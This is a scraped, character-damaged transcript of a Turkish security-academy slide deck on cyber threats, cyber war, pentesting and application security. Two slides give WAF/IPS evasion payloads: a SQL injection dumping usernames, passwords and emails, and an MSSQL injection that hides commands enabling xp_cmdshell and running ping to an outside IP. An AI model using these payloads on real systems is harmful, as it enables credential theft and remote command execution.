Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

download Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

of 40

Transcript of Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    1/40

    Siber Tehditler, Savunma Yntemleri

    ve HackerlarnBaarsHuzeyfe NAL

    Bilgi Gvenlii AKADEMS

    [email protected]

    mailto:[email protected]://www.bga.com.tr/http://www.bga.com.tr/mailto:[email protected]
  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    2/40

    Konumac Hakknda |Huzeyfe NAL

    Bilgi Gvenlii Danman (i hayat)

    Bilgi Gvenlii AKADEMS(www.bga.com.tr)

    A Gvenlii Aratrmacs (gerek hayat)

    Blogger www.lifeoverip.net

    2Bilgi Gvenlii AKADEMS | www.bga.com.tr

    http://www.bga.com.tr/http://www.lifeoverip.net/http://www.lifeoverip.net/http://www.bga.com.tr/
  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    3/40

    Genel Terim ve Kavramlar

    Siber sava(cyber warfare), siber tehditler, sibersu(cyber crime), cyber espionage, cyberintelligence, siber sabotaj(cyber sabotage), siber

    terrizm (Cyberterrorism), siber casusluk (Cyber

    spying), siber silah (cyber o weapon), szmatestleri (penetration test), siber

    gvenlikyarmalar(CTF -Capture The Flag)

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    4/40

    Teknolojinin Yaam Dngs

    TeknolojiyiAratr

    TeknolojiyiAl

    Teknolojiyiren

    TeknolojiyiKullan

    GvenliiniSala

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    5/40

    Obamadan nciler...

    So cyberspace is real. And so are the risks that comewith it.

    In short, America's economic prosperity in the 21stcentury will depend on cybersecurity.

    it's now clear this cyber threat is one of the most

    serious economic and national security challenges weface as a nation.

    And finally, we will begin a national campaign topromote cybersecurity awareness

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    6/40

    Siber Hayat

    Siber tanm: Altyaps biliim sistemleri olan ve gerek

    hayatn glgesi niteliindeki yaam.

    Alveri, oyun, film, mzik, ticaret, yemek, komuluk,istihbar bilgi toplama vs gibi gerek hayatn vazgeilmez

    ileri siber hayatta da benzeri isimlerle yer almaktadr. Halk iinde sanal dnya olarak da bilinir.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    7/40

    Siber Gvenlik

    Siber hayatn gvenlii(gizlilik, btnlk ve eriilebilirlik)

    salanmas amacyla gerekletirilen faaliyetlerin tm.

    Bilgi gvenliinden fark: daha soyut ve geni bir alankapsamas

    Bilgi gvenlii teknik, siber gvenlik sosyal bir tanmdr. ~2015li yllarda en sk kullanlacak tanmlardan.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    8/40

    er ven ere nyay nasEtkiler?

    Wikileaks...

    Ortadouda devlet bakanlarnn son durumu

    Trkiyede kaset mevzular

    Siber dnyann salad snrsz zgrlk(?) sayesindekiilerin zel yaam kavram kalmayacaktr

    22 Austosda Trkiye internetindegerekletirilecek kstlamalar

    Artk tm internet kullanclar belirli profil seerek internetebalanacak ve izlenebilecek!

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    9/40

    Gncel Durum

    Siber hayat kavramnn yerlemesi.

    Siber gvenlik, siber sava, siber ordu tanmlarnnkonuulmaya balanmas.

    Yerli gvenlik yazlmlarnn gelitirilmeye

    balanmas(yerli retim %0,1 seviyelerinde) Temel eksiklik: bilgi gvenlii farkndal, teknik

    konularda alanlarn temel bilgi eksiklii.

    Siber gvenliin lks deil, gereksinim olduufikrinin yaygnlamas.

    Siber Gvenlik Dernei kurulumu.(2011)

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    10/40

    Siber Tehditler

    Bilgi gvenliini ihlal edecek tm faaliyetler

    DDoS saldrlar: internet zerinden sistemlerineriilebilir olmasn engelleme

    Hacking aktiviteleri

    Bilgi szdrma faaliyetleri RSA

    Sony PS a yelerinin bilgilerinin szmas

    Prestij zarar verme faaliyetleri

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    11/40

    Siber Sava

    Biliim sistemleri kullanlarakgerekletirilen ve amac bir irkete, bir

    lkeye veya bir gruba ynelik maddi, manevi zararlar verme olanfaaliyetler.

    2007 Estonya rnei: DDoS saldrlaryla lkenin internet sisteminin ilemez hale getirilmesi

    2010 Trkiye rnei: Yotube yasan protesto eden bir grup Hacker

    eitli bakanlk sitelerine ynelik DDoS saldrlar gerekletirdi.

    2011 Trkiye rnei: Anonymous grubunun 22 Austosu protesto eden saldrlar

    Etkilenen kurumlar?

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    12/40

    Siber Sava Taraflar

    Hacker gruplar

    Ticari markalar, ticari firmalar

    Devletler

    Muhalif gruplar

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    13/40

    Siber Ordu

    lkeyi, kurumu siber dnyadan gelebilecek

    tehlikelere kar koruyacak ve gerektiinde sibersaldrlar gerekletirebilecek yetenekteki bilgigvenlii uzmanlarnn

    Siber ordu mensubu tm askerler hem saldr hemde koruma yntemlerini ok iyi bilmekzorundadrlar .

    ki tr siber ordu bulunmaktadr: Devlet eliyle yetitirilen resmi birimler

    Gnll fakat resmi aya olmayan birimler

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    14/40

    Dnyadaki Siber Ordular

    lk siber ordu Amerika Birleik Devletleri tarafndan gizli

    olarak kurulmutur. Bu konuda en nemli yatrmlardan biri K.Koredir. Trkiyede henz bilinen dzenli bir siber ordu yoktur. Baz lkelerde gnll, siber ordular bulunmaktadr. 2010 ylnda birok lke siber ordu konusunu gndemine

    almtr.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    15/40

    Cyber spying

    eitli hacking yntemleri kullanlarak hedefirket/kurum/devletten bilgi szdrmak

    zellikle istihbarat tekilatlarnn sk bavurduuyntemlerden biridir.

    stihbarat tekilatlar gvenlik sistemlerineyakalanmayacak malware, virs gelitirme konusundaciddi yatrmlar gerekletirmektedir.

    Bunun en iyi rnei randa yaanan Stuxnet ad verilenve dorudan SCADA sistemlere ynelik aksiyon alanktcl yazlmdr.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    16/40

    Cyber weapon

    Klasik dnyadaki silah kavramndan farkl olaraksiber silah sadece yoketme amac tamamaktadr.Yeri geldiinde yoketme, yeri geldiinde iz silme veyeri geldiinde hedef sistemlerden bilgi karma

    amal kullanlacak yntem ve aralardr. Stuxnet en gncel ve ideal siber silah rneidir.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    17/40

    Siber Casus

    Siber casuslar siber ordu elemanlardr

    En az 3 yl sren zel eitimlerden geirilerek bilgigvenliine ait tm konular bilen ve 3 konuda ileri seviyeuzman olan kiilere verilen lakaptr.

    Bu kiilerin grevleri biliim sistemlerini kullanarak bilgiszdrmaktr.

    Grevleri genellikle teknoloji irketlerinde bilgisayarlailgili herhangi bir alandr

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    18/40

    lkelerin siber gvenlik stratejileri

    Siber gvenlik konusunda alnacak stratehjiler

    dorudan o lkenin gelimiliiyle alakaldr Siber gvenlik demek teknolojiden daha fazla

    faydalanlyor demek ve daha fazla korunma ihtiyacduyuluyor demektir.

    2008-2011 yllar arasnda ou gelimi lke sibergvenlik stratejilerini aklam ve yrrlekoymutur.

    Trkiyede henz kabul edilen bir siber gvenlikstratejisi yoktur

    Krmz kitaba eklenen satr hari

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    19/40

    lkelerin siber gvenlik stratejileri

    Canada Cyber Security Strategy

    http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-

    eng.pdf

    ESTONIA Cyber Security Strategy

    http://www.mod.gov.ee/files/kmin/img/files/Kuberjulg

    eoleku_strateegia_2008-2013_ENG.pdf

    Cyber Security Strategy for Germany

    http://www.bmi.bund.de/SharedDocs/Downloads/DE/Themen/OED_Verwaltung/Informationsgesellschaft/cy

    ber_eng.pdf?__blob=publicationFile

    http://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.mod.gov.ee/files/kmin/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdfhttp://www.publicsafety.gc.ca/prg/ns/cbr/_fl/ccss-scc-eng.pdf
  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    20/40

    lkelerin siber gvenlik stratejileri

    Cyber Security Strategy of the United Kingdom

    http://www.computerweekly.com/blogs/read-all-

    about-

    it/Cabinet%20Office%20Cybersecurity%20review%2009

    .pdf Australian Government Cyber SeCurity Strategy

    http://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/

    (4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-

    +for+website.pdf/$file/AG+Cyber+Security+Strategy+-

    +for+website.pdf

    http://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.ema.gov.au/www/agd/rwpattach.nsf/VAP/(4CA02151F94FFB778ADAEC2E6EA8653D)~AG+Cyber+Security+Strategy+-+for+website.pdf/$file/AG+Cyber+Security+Strategy+-+for+website.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdfhttp://www.computerweekly.com/blogs/read-all-about-it/Cabinet%20Office%20Cybersecurity%20review%2009.pdf
  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    21/40

    Penetration test

    Sistemlerin gvenliini test ettirmek amacylagerekletirilen ve hackerlarn kullandklaryntemleri kullanan beyaz apkallarn gzylesistem aklklarnn aranmas

    Whitebox pentest

    Blackbox pentest

    Olmak zere temelde ikiye ayrlr. Ciddi teknik altyapgerektiren bir prosestir.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    22/40

    CTF -Capture The Flag

    Bilgi gvenlii uzmanlarnn offensive securitykonular hakknda bilgi sahibi olmalar ve pratikyapmalar iin gelitirilmi bir oyun trdr.

    Genellikle red team(saldrgan) ve blue team olmak

    zere ikiye ayrlrlar

    Red team hedefleri ele geirmeye, blue team dehedefleri savunmaya ynelik abalar.

    Ve oyun boyunca her iki taraf da pratik olarak

    bilgilerini kullanma ve test etme ans yakam olur.

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    23/40

    II. Blm

    Bilgi Gvenlii AKADEMS | www.bga.com.tr 23

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    24/40

    Klasik Gvenlik Anlay

    Tmden savunma!

    rn temelli bir gvenlik anlay

    rn= sihirbaz bak as(bilgi-sayar)

    Trkiyeye zel deil tm dnya iin geerli

    Teknik sorunlar teknik yollarla zlr, insanisorunlar insanla zlr

    Temel bilgi sahibi olmadan ileri seviye ileryapmaya alma

    TCP/IP bilmeden Firewall/IPS ynetmek

    24Bilgi Gvenlii AKADEMS | www.bga.com.tr

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    25/40

    Uygulama Gvenlii Nedir?

    Yazlm gelitiriciler en ksa srede ortaya rn karma peindeler.

    Guvenlik uzmanlar younlukla altyap gvenliine ynelmilerdir

    Uygulama Gvenlii: retilen yazlmn fonksiyonlarn yitirmedengvenli bir ekilde gelitirilmesini salama.

    UygulamaGvenlii

    Yazlm Gelitirme IT Gvenlik

    25

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    26/40

    Hacking Stage 6Wikipedia, Feb 9 2007

    Neden Uygulama Gvenlii

    26Bilgi Gvenlii AKADEMS |www.bga.com.tr

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    27/40

    Neden Uygulama Gvenlii, devam

    27Bilgi Gvenlii AKADEMS | www.bga.com.tr

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    28/40

    Gvenlik Dnyasnn Gidiat

    Firewall IDS/IPS WAF

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    29/40

    Hackerlarin Gidiat

    ClientinSecurity

    MobileinSecurity

    SocialNetworks/Eng.

    /

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    30/40

    Hacker / gvenlik uzman

    Gvenlik uzmanlar prosedrel hareket ettii iin

    hackerlara gre bir adm geriden gelir.

    Gvenlik uzmanlar iin koruma bir meslek, hackerlariin bu korumalar amak bir zevktir.

    Hacker iin bilgi gvenlii diye bir kavram yoktur,sadece almas gereken engel vardr!

    Hackerlarn mesaisi, says ve motivasyonu farkldr...

    Siber dnyada gece gndz kavramlar yoktur 7/24 mesai yaparlar!

    rnek: Wordpress akl

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    31/40

    Bak As

    l k l

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    32/40

    SMS ile kaos oluturma!

    d

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    33/40

    HTTPS zerinden Free Internet

    Baz durumlarda HTTPS portu zerinde hi eriim

    kontrol olmayabilir

    l l l

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    34/40

    SQL Yorumlar ile IPS Atlatma

    /* comment */ yorum satr olarak alglanr(SQL

    +WAF+IPS tarafndan)

    /*!sql-code*/ ve /*!12345sql-code*/ yorum olarak

    alglanmaz(SQL tarafndan)(WAF+IPSlertarafndan

    yorum olarak alglanr)

    /?id=1/*!limit+0+union+select+concat_ws(0x3a,us

    ername,password,email)+from+users*/

    34Bilgi Gvenlii AKADEMS | www.bga.com.tr

    di K ll k I S A l

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    35/40

    Encoding Kullanarak IPS Atlatma

    Inline alan WAF/IPSlerdeie yarar

    35Bilgi Gvenlii AKADEMS | www.bga.com.tr

    k i il l

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    36/40

    SQL Reverse Fonksiyonu ile IPS Atlatma

    SQL Sunucularda bulunan reverse fonksiyonu kullanlr Reverse(lqs) = sql

    var=1';DECLARE @a varchar(200) DECLARE @bvarchar(200) DECLARE @c varchar(200) SET @a =REVERSE ('1 ,"snoitpo decnavda wohs"

    erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURESET @b = REVERSE ('1,"llehsdmc_px"erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURESET @c =REVERSE('08.911.39.19 gnip" llehsdmc_px')EXEC (@c);--

    REVERSE('08.911.39.19 gnip" llehsdmc_px')= ping91.93.119.80

    36Bilgi Gvenlii AKADEMS | www.bga.com.tr

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    37/40

    N S A V Bil i G lii T l l

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    38/40

    NetSec A Ve Bilgi Gvenlii Topluluu

    Trkiyenin en geni katlml bilgi gvenlii e-posta

    listesi ve topluluu

    ~1200 ye

    cretsiz ye olabilirsiniz.

    Gvenlik dnyasnda yaynlanan nemli haberler,gvenlik yamalar ve birok teknik konudatartma...

    yelik iin

    http://www.lifeoverip.net/netsec-listesi/

    38Bilgi Gvenlii AKADEMS | www.bga.com.tr

    S l ?

    http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/http://blog.lifeoverip.net/netsec-listesi/
  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    39/40

    Sorular?

    39Bilgi Gvenlii AKADEMS | www.bga.com.tr

    Bil i G lii AKADEMS

  • 7/30/2019 Yeni Nesil Siber Tehditler Ve Savunma Yontemleri

    40/40

    Bilgi Gvenlii AKADEMS

    40